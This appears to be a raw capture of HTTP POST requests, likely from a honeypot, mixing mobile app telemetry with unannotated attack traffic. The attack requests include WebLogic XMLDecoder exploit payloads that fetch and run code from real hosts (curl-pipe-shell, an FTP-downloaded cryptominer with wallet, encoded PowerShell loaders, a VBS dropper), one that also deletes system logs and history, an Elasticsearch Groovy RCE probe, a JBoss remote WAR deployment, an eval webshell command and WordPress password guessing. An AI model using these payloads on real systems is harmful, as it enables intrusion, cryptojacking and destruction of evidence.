Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 27
Cache-Control: no-cache
log=admin&pwd=jamesatchue77
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
leng=die('Hello, Peppa!');
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1427
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;ssss.txt&amp;@echo binary&gt;&gt;ssss.txt&amp;@echo get /xdxdxd.exe&gt;&gt;ssss.txt&amp;@echo quit&gt;&gt;ssss.txt&amp;@ftp -s:ssss.txt -v -A&amp;@start xdxdxd.exe -o 213.32.29.143:14444 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
EaZbxo7PYyRxA77hcV9eRkOxby7nph9vINrr1uXNmhq2rj1QO/8uam7OAY8LEXwXp6qCAa60XVTRdcononhwMkmHkhZfZ7C8HKRMMjtHJcVnpbBpc4Gl7PiGRwfITUnflebtqi1aEp9ZfbJ2Ad4+BFQEayaAsKtT1kDzXU8v2EW3gGf7FLNmiJVf5qkN+YnlKjFBL3pKszxNdHIB6BBypMQB+mzYQv1huXkW5585vHcIBUoS2pW5V4r1SK1k+affHvubjYHyNWfPZkVUYwv7A1wWTDUmUyWAbWOsCLBJQMAp0ZNyfWnNdS8Jyke5K1/IwRzbGKiV8kad38JGp9smjsmu6lHLSUO0gQ0PoJyi6N8Ttg9fYin3jusinlgR9Unrp8c0jRjfvFURAiwKn3Pwd1oWOWDNtVJ7qKKRWo3HCOhrhrot0bsw
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
axa=die('Hello, Peppa!');
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2547
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/System32/taskhostxz.exe&quot;&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/System32/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;cscript.exe C:/Windows/System32/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://behacdn.ksmobile.net/fcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 46
.∂ìÍÕ`i'c
K6ÍoòKÌVcpjBhC*8kSH{\{
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[ signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxpsr java.net.URLñ%76¸‰rIhashCodeIportL authorityq~Lfileq~Lhostq~Lprotocolq~Lrefq~xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~ thttppxur[Ljava.lang.String;≠“VÁÈ{Gxpt java.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496483941788
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2340
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149297256719&a=PSCMN&i=3168963859&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
FK0LwtzLMWsmVcZ2SqxY9QSzZjARp29UH54g87wI3OxbabTIz+vWOtqMUHwBrkdyRHFC3qY01ALUz0Kfl8CcvnV+Yiu+xfRDTSNx4jPXdhEE+oT0Mmtrdp1Zo/zbuIxTv7YDlCCFv1tA9f4NQqDzIQNYhugqSVd2sZ3zae/m/EJ6F+tzN8wej06kM3c66eNmw8j8n/2H7hG2sw4bDu0XFSf+7MzwVU4pI8Xo2W+TMtN3jqPKtxcovs/wmQOmIy6G4awwMLCiBWkJPi7yVXATS1voaxloo3k2/8z2CLpK2m5MWtD1JSCmuFtVvr042oGBVJMQguZIeRBuQ/WAzjdwLtjA1pyalmL+E4uWd1+UXpGfMlI=
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
617710
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0969227ac9527053ebb0ffdc9d96c2d5
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb--
POST /test.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referer: http://x.x.x.x/test.php
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Content-Length: 375
Host: x.x.x.x
123=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7
POST http://apkquery.ksmobile.net/fqexpack HTTP/1.1
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: apkquery.ksmobile.net
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 127
ÜkyRZr9V_^$k^^Fyc5«0 AÇfl
d¶%ˆ +ÇXÚØüäƒÕA[◊1fïnDû8¸x”Å>¢•ãËuƒu*  A]Œ†¸vúÇA9fZøOÌÊßÕyáá~Ïıå≤óâÍL<`ç˜8!©˜ßç1j
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 35
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue9999
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84
{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
Q6ZXxNyeYqmEzDOLoOPlyFK53Wliq4+rzV/2NNfBAdwUgHVNja7z6Kcyb/JmN45C4sasd7PLxIdaEYnEGmA5gGvR+iwvBBeVXo/w6E67Jg5Cr2QXj+0h6lLKrIHwrzRY196mGYc3TZc3fTpLhKPMy512zB0/dJvrWwKFAa25N51O0a9IhrfLqk8gqltzaYi5DG/Sl1Er84LCyNqYqasj4s8UQlUf9PGkq338C/bIozyYJh3I8+7O286OIoWEiNTEgf5+r7faLCp+rWD3wUvGcGE8RYUStY6k73rl6gjQOlb/2ScMpecYIf2dDqNz4Sznv6AzwRngPAsvBjLmFAlSubMOE9Bs5Y5yG2srh5MlFAO9m5AbrTdS+NYQ9FK7lZp++R06QedHcL9MLzT+DYppz/JpvrDE6Aj4fg+cxNU=
POST http://android.bugly.qq.com/rqd/async HTTP/1.1
wup_version: 3.0
cmd: 840
strategylastUpdateTime: 1490687517000
appVer: 18
prodId: e4696cbcd6
bundleId: com.differencetenderwhite.skirt
secureSessionId: 3d84fc1e7cca44829282b7041cdf97ad_SZ
sdkVer: 2.2.2
platformId: 1
A37: HSPA%2B
A38: HSPA%2B
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: android.bugly.qq.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST /404 HTTP/1.1
User-Agent: apache
Host: x.x.x.x
Content-Length: 4
Connection: Keep-Alive
Cache-Control: no-cache
test
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://p-behacdn.ksmobile.net/cu HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 666
ö%\ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcékV∏iRËc^<∞êΩúrjå¥ÚkZ&=%Ocøúèï@hÃ(8k£I)0OzBo‚ØDhA*8kZ&=0OoAvpffG*:k[&=0koBcsBd*0kX&<0Oo]tQkA}C&H±R&?0NoBc#∫Ph@?8g(¸50MoBcpjBhC*;~Z*HÍGo@cpjBhC*8kY3=<7µJcrjBhC*8kZ&>%Oc>πxj@hC*8kZ&=0LzBo‹BhA*bkZ&~;pmAvpfÜCF*:kc&=0˜∂;csBd€˚8kX&V0Oo*Ò&aA}C&√ ]&?0OoBcpjBh@?8g”;0MoEcpj’OE*;~Z*éFo@cxjBhe”PY3=<"‚BcrjKhC*ÀEı&>%Oc!wj@hfl*8k
